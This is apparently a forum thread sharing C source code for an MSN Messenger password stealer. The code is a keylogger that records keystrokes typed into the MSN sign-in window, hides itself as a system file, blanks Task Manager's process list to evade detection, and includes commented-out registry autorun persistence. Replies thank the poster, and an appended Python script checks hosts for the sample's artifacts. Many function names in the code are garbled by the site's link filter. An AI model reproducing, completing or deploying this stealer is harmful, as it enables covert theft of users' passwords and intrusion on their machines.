
Stealer MSN


ANTRAX
« on: May 22, 2011, 10:00:32 pm »
Code: C
  1. #include <stdlib.h>    
  2. #include <windows.h>
  3. #include <stdio.h>
  4. #include <commctrl.h>
  5. #include <Winuser.h>  
  6. #include <string.h>
  7.  
  8. // all includes should be standard in dev
  9.  
  10. /*
  11.    Name: KOrUPt(not tellin)
  12.    Author: KOrUPt
  13.    Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
  14.    Date Written: 01/10/06 - 04/10/06
  15.    Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvments you make, thanks.
  16. */
  17.  
  18.  
  19.  void keys(int key,char *file) // if you try and view the exe in notepad it discloses
  20. {                                                        // quite alot of source code(not good), so i may change the key output to codes instead
  21.  
  22. FILE *key_file;
  23.  
  24. key_file = You are not allowed to view links. Register or Login(file,"a+");
  25.  
  26. Sleep(10);
  27.  
  28. if (key==8)
  29.  
  30. You are not allowed to view links. Register or Login(key_file,"%s","[del]");
  31.  
  32. if (key==13)
  33.  
  34. You are not allowed to view links. Register or Login(key_file,"%s","\n");
  35.  
  36. if (key==32)
  37.  
  38. You are not allowed to view links. Register or Login(key_file,"%s"," ");
  39.  
  40. if (key==VK_CAPITAL)
  41.  
  42. You are not allowed to view links. Register or Login(key_file,"%s","[Caps L]");
  43.  
  44. if (key==VK_TAB)
  45.  
  46. You are not allowed to view links. Register or Login(key_file,"%s","[TAB]");
  47.  
  48. if (key ==VK_CONTROL)
  49.  
  50. You are not allowed to view links. Register or Login(key_file,"%s","[CTRL]");
  51.  
  52. if (key ==VK_PAUSE)
  53.  
  54. You are not allowed to view links. Register or Login(key_file,"%s","[PAUSE]");
  55.  
  56. if (key ==VK_ESCAPE)
  57.  
  58. You are not allowed to view links. Register or Login(key_file,"%s","[ESC]");
  59.  
  60. if (key ==VK_END)
  61.  
  62. You are not allowed to view links. Register or Login(key_file,"%s","[END]");
  63.  
  64. if (key==VK_HOME)
  65.  
  66. You are not allowed to view links. Register or Login(key_file,"%s","[HOME]");
  67.  
  68. if (key ==VK_LEFT)
  69.  
  70. You are not allowed to view links. Register or Login(key_file,"%s","[LEFT]");
  71.  
  72. if (key ==VK_UP)
  73.  
  74. You are not allowed to view links. Register or Login(key_file,"%s","[UP]");
  75.  
  76. if (key ==VK_RIGHT)
  77.  
  78. You are not allowed to view links. Register or Login(key_file,"%s","[RIGHT]");
  79.  
  80. if (key ==VK_DOWN)
  81.  
  82. You are not allowed to view links. Register or Login(key_file,"%s","[DOWN]");
  83.  
  84. if (key ==VK_SNAPSHOT)
  85.  
  86. You are not allowed to view links. Register or Login(key_file,"%s","[PRINT]");
  87.  
  88. if (key ==VK_NUMLOCK)
  89.  
  90. You are not allowed to view links. Register or Login(key_file,"%s","[NUM LOCK]");
  91.  
  92. if (key ==VK_RETURN)
  93.  
  94. You are not allowed to view links. Register or Login(key_file,"%s","[ENTER]\n\n");
  95.  
  96. if (key ==VK_SHIFT)
  97.  
  98. You are not allowed to view links. Register or Login(key_file,"%s","[SHIFT]");
  99.  
  100. if (key ==VK_SPACE)
  101.  
  102. You are not allowed to view links. Register or Login(key_file,"%s","[SPACE]");
  103.  
  104. if (key ==VK_LBUTTON)
  105.  
  106. You are not allowed to view links. Register or Login(key_file,"%s","[LM B]");
  107.  
  108. if (key ==VK_RBUTTON)
  109.  
  110. You are not allowed to view links. Register or Login(key_file,"%s","[RM B]");
  111.  
  112. if (key ==VK_MENU)
  113.  
  114. You are not allowed to view links. Register or Login(key_file,"%s","[ALT]");
  115.  
  116. if (key ==VK_LWIN)
  117.  
  118. You are not allowed to view links. Register or Login(key_file,"%s","[Windows key]");
  119.  
  120. if (key ==VK_ADD)
  121.  
  122. You are not allowed to view links. Register or Login(key_file,"%s","[+]");
  123.  
  124. if (key ==VK_SUBTRACT)
  125.  
  126. You are not allowed to view links. Register or Login(key_file,"%s","[-]");
  127.  
  128. if (key ==VK_DECIMAL)
  129.  
  130. You are not allowed to view links. Register or Login(key_file,"%s","[.]");
  131.  
  132. if (key ==VK_DIVIDE)
  133.  
  134. You are not allowed to view links. Register or Login(key_file,"%s","[DIVIDE KEY]");
  135.  
  136. if (key ==VK_NUMPAD0)
  137.  
  138. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 0]");
  139.  
  140. if (key ==VK_NUMPAD1)
  141.  
  142. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 1]");
  143.  
  144. if (key ==VK_NUMPAD2)
  145.  
  146. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 2]");
  147.  
  148. if (key ==VK_NUMPAD3)
  149.  
  150. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 3]");
  151.  
  152. if (key ==VK_NUMPAD4)
  153.  
  154. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 4]");
  155.  
  156. if (key ==VK_NUMPAD5)
  157.  
  158. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 5]");
  159.  
  160. if (key ==VK_NUMPAD6)
  161.  
  162. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 6]");
  163.  
  164. if (key ==VK_NUMPAD7)
  165.  
  166. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 7]");
  167.  
  168. if (key ==VK_NUMPAD8)
  169.  
  170. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 8]");
  171.  
  172. if (key ==VK_NUMPAD9)
  173.  
  174. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 9]");
  175.  
  176. if (key ==VK_F1)
  177.  
  178. You are not allowed to view links. Register or Login(key_file,"%s","[F1 KEY]");
  179.  
  180. if (key ==VK_F2)
  181.  
  182. You are not allowed to view links. Register or Login(key_file,"%s","[F2 KEY]");
  183.  
  184. if (key ==VK_F3)
  185.  
  186. You are not allowed to view links. Register or Login(key_file,"%s","[F3 KEY]");
  187.  
  188. if (key ==VK_F4)
  189.  
  190. You are not allowed to view links. Register or Login(key_file,"%s","[F4 KEY]");
  191.  
  192. if (key ==VK_F5)
  193.  
  194. You are not allowed to view links. Register or Login(key_file,"%s","[F5 KEY]");
  195.  
  196. if (key ==VK_F6)
  197.  
  198. You are not allowed to view links. Register or Login(key_file,"%s","[F6 KEY]");
  199.  
  200. if (key ==VK_F7)
  201.  
  202. You are not allowed to view links. Register or Login(key_file,"%s","[F7 KEY]");
  203.  
  204. if (key ==VK_F8)
  205.  
  206. You are not allowed to view links. Register or Login(key_file,"%s","[F8 KEY]");
  207.  
  208. if (key ==VK_F9)
  209.  
  210. You are not allowed to view links. Register or Login(key_file,"%s","[F9 KEY]");
  211.  
  212. if (key ==VK_F10)
  213.  
  214. You are not allowed to view links. Register or Login(key_file,"%s","[F10 KEY]");
  215.  
  216. if (key ==VK_F11)
  217.  
  218. You are not allowed to view links. Register or Login(key_file,"%s","[F11 KEY]");
  219.  
  220. if (key ==VK_F12)
  221.  
  222. You are not allowed to view links. Register or Login(key_file,"%s","[F12 KEY]");
  223.  
  224. if (key ==VK_NUMLOCK)
  225.  
  226. You are not allowed to view links. Register or Login(key_file,"%s","[NUMLOCK KEY]");
  227.  
  228. if (key ==VK_SCROLL)
  229.  
  230. You are not allowed to view links. Register or Login(key_file,"%s","[SCROLL LOCK]");
  231.  
  232.  
  233. /*        // WONT WORK ON WIN 9X
  234.  
  235.  
  236. if (key ==VK_OEM_PLUS)
  237.  
  238. fprintf(key_file,"%s","[+]");
  239.  
  240. if (key ==VK_OEM_COMMA)
  241.  
  242. fprintf(key_file,"%s","[,]");
  243.  
  244. if (key ==VK_OEM_MINUS)
  245.  
  246. fprintf(key_file,"%s","[-]");
  247.  
  248. if (key ==VK_OEM_PERIOD)
  249.  
  250. fprintf(key_file,"%s","[.]");
  251.  
  252. */
  253.  
  254. if (key ==190 || key==110)
  255.  
  256. You are not allowed to view links. Register or Login(key_file,"%s",".");
  257.  
  258.  
  259. if (key >=96 && key <= 105){
  260.  
  261. key = key - 48;
  262.  
  263. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  264.  
  265. }
  266.  
  267. if (key >=48 && key <= 59)
  268.  
  269. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  270.  
  271.  
  272.  
  273. if (key !=VK_LBUTTON || key !=VK_RBUTTON){
  274.  
  275. if (key >=65 && key <=90){
  276.  
  277. if (GetKeyState(VK_CAPITAL))
  278.          
  279. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  280. else
  281.  
  282. {
  283.  
  284. key = key +32;
  285.  
  286. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  287.  
  288.  
  289.  
  290. }
  291. }
  292.  
  293. }
  294.  
  295. You are not allowed to view links. Register or Login(key_file);
  296.  
  297.  
  298.  
  299. }
  300.  
  301.  
  302. char buffer[300] = "";
  303. HWND currentwin;
  304. DWORD pid;
  305. unsigned char reg[2] = "1";
  306. HMODULE modH = GetModuleHandle(0);
  307. char dir[255];
  308. char dir2[MAX_PATH];
  309. char dir3[MAX_PATH];
  310. char KeyLogPath[MAX_PATH];                        // holds dir path for wordsv80.ini
  311.  
  312.  
  313.   // Functions
  314.  
  315. BOOL CALLBACK block(HWND hwnd,LPARAM lParam)  // used to hide from taskmgr
  316. {
  317.         char classname[150] = "";
  318.         char windowtext[150] = "";
  319.  
  320.         GetWindowText(hwnd,windowtext,149);
  321.         GetClassName(hwnd,classname,249);
  322.  
  323.    
  324.         if (You are not allowed to view links. Register or Login(windowtext,"Processes") && You are not allowed to view links. Register or Login(classname,"SysListView32") !=NULL)
  325.         {
  326.                 SendMessage(hwnd,LVM_DELETEALLITEMS,0,0);  // clears Taskmgr every x seconds
  327.                 return FALSE;
  328.         }      
  329.         return TRUE;
  330. }
  331.  
  332. DWORD WINAPI HideProgram() // also used to hide from taskmgr
  333. {
  334.   for(;;)
  335.  {
  336. Sleep(5);
  337. EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);   // calls block function evrey 5 milee seconds
  338.  }
  339. }
  340.  
  341.  
  342.  
  343. int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
  344.  {
  345.  
  346. char i;
  347. GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
  348. You are not allowed to view links. Register or Login(KeyLogPath,"//wordsv80.ini");      // this is the file that keys are saved to
  349.  
  350.  
  351.  
  352.    // Add to system folder
  353.  
  354. GetModuleFileName(modH, dir2, 256);
  355. GetSystemDirectory(dir,255);
  356.  
  357. You are not allowed to view links. Register or Login(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
  358. CopyFile(dir2,dir,FALSE);        //  but dont know how to change the icon pic, lol, will learn how to soon though
  359. unsigned char dir3[25] = "Sndserv.exe";
  360. SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out
  361.  
  362.  
  363.  
  364. // Add to registry
  365.  
  366. // I think weird decimal vaules makes it less likly to be deleted because it
  367. // hasnt got any spefic name, it could be somthing really importent, dont forget,
  368. // most people are quite scared of editing there reigstry in case they ruin the whole pc,
  369. // if they see something they dont understand, then the old phase "better save than sorry" springs to mind
  370. // i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
  371. // but im talkin about the N0oBs here, sorry noobs lol
  372.  
  373. // oh well back to the code
  374. /*
  375. HKEY key1;
  376. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
  377. RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
  378. RegCloseKey(key1);
  379.  
  380.  
  381. HKEY key2;
  382. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
  383. RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
  384. RegCloseKey(key2);                                                                               //  i dont fully know how this key will react on startup, should be alright lol
  385.  
  386.  
  387.  
  388. HKEY key3;
  389. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
  390. RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
  391. RegCloseKey(key3);
  392.  
  393. HKEY key4;
  394. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
  395. RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
  396. RegCloseKey(key4);
  397.  
  398.  
  399. // was goin to disable regedit, but decided not to
  400. // in case made the user suspicuos, i prefer the stealth method
  401.  
  402.   */
  403.  
  404.  
  405.  
  406.   while(1)
  407. {
  408. Sleep(20);   // to some save cpu
  409.  
  410.  
  411.  
  412.          // Just in case we need an emergency exit
  413.    if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
  414.    {
  415.    MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
  416.          return 0;
  417.    }
  418.  
  419.                 // cannot close program while login box is present
  420. jump:
  421. currentwin =  GetForegroundWindow();
  422. GetWindowText(currentwin,(char*)buffer,300);
  423. if(You are not allowed to view links. Register or Login(buffer,"Sign in to .NET messenger Service- MSN Messenger"))  // or anything else you want a password to lol
  424. {
  425. GetWindowThreadProcessId(currentwin,&pid);
  426.  
  427. for(i=8;i<=190;i++)      // activate keyloger
  428. {
  429. if (GetAsyncKeyState(i) == -32767)
  430. {
  431.  
  432.  
  433.  
  434.  
  435.          keys (i,KeyLogPath);   // loop through keys function and add keys pressed to file
  436.  
  437.  
  438.   goto jump;            // to recheck if logon window is still active, if not continue searching untill found
  439. }
  440. }
  441. }
  442. }
  443. }
  444.  
  445.  
« Last edit: February 08, 2014, 05:47:50 pm by Expermicid »
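
The on-disk and registry artifacts visible in the source above (the `Sndserv.exe` copy with hidden, read-only and system attributes, the `wordsv80.ini` log, and the autorun values in the commented-out registry section) can be turned into a small host-triage check. This is an added example, not part of the original post or its author's code; the record format and the sample inventory are constructed, and the Windows and System directories are assumed to be named `Windows` and `System32`/`System`.

```python
import ntpath

# Win32 file attribute bits (Windows SDK values)
READONLY, HIDDEN, SYSTEM = 0x1, 0x2, 0x4
STEALTH = READONLY | HIDDEN | SYSTEM

# Artifacts named in the posted source
DROPPED_EXE = "sndserv.exe"   # copy placed in the System directory
LOG_FILE = "wordsv80.ini"     # keystroke log in the Windows directory
AUTORUN_KEYS = {"run", "runonce", "runservices", "runservicesonce"}


def triage(files, autoruns):
    """files: (full_path, attribute_bits); autoruns: (key, value_name, data)."""
    findings = []
    for path, attrs in files:
        name = ntpath.basename(path).lower()
        parent = ntpath.basename(ntpath.dirname(path)).lower()
        if name == DROPPED_EXE and parent in ("system32", "system"):
            # All three attribute bits set matches the SetFileAttributes call
            sev = "high" if (attrs & STEALTH) == STEALTH else "medium"
            findings.append((sev, f"dropped binary: {path}"))
        elif name == LOG_FILE and parent == "windows":
            findings.append(("high", f"keystroke log: {path}"))
    for key, value, data in autoruns:
        leaf = key.rstrip("\\").rsplit("\\", 1)[-1].lower()
        target = ntpath.basename(data.strip('"')).lower()
        if leaf in AUTORUN_KEYS and target == DROPPED_EXE:
            findings.append(("high", f"autorun {key}\\{value} -> {data}"))
    return sorted(findings)


# Constructed sample inventory (not collected from a real host)
RUN = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_FILES = [
    (r"C:\Windows\System32\Sndserv.exe", STEALTH),
    (r"C:\Windows\wordsv80.ini", 0x20),
    (r"C:\Windows\System32\notepad.exe", 0x20),
    (r"C:\Users\a\Downloads\Sndserv.exe", 0x20),  # wrong directory: ignored
]
SAMPLE_AUTORUNS = [
    (RUN, "1x00387z", "Sndserv.exe"),
    (RUN, "SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for severity, message in triage(SAMPLE_FILES, SAMPLE_AUTORUNS):
        print(severity, message)
```

Matching on file name and directory alone is weak evidence, so a hit is a prompt to inspect the file and the process that wrote it.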


t0d_mephis
« Reply #1 on: June 22, 2011, 01:14:21 pm »
What is the function of this?   :o :o (You posted good source code! Thanks)

startsgame
« Reply #2 on: June 22, 2011, 02:28:47 pm »
Stealer (in Spanish, "ladrón de información", that is, "information thief") is the generic name for malicious computer programs of the trojan type that get into a computer over the internet in order to fraudulently obtain the owner's confidential information, such as their login name for websites, password or credit card number.

Infostealer can also affect the MSN Messenger e-mail service, sending fake messages and even inserting into them data that users included in their messages through that service.
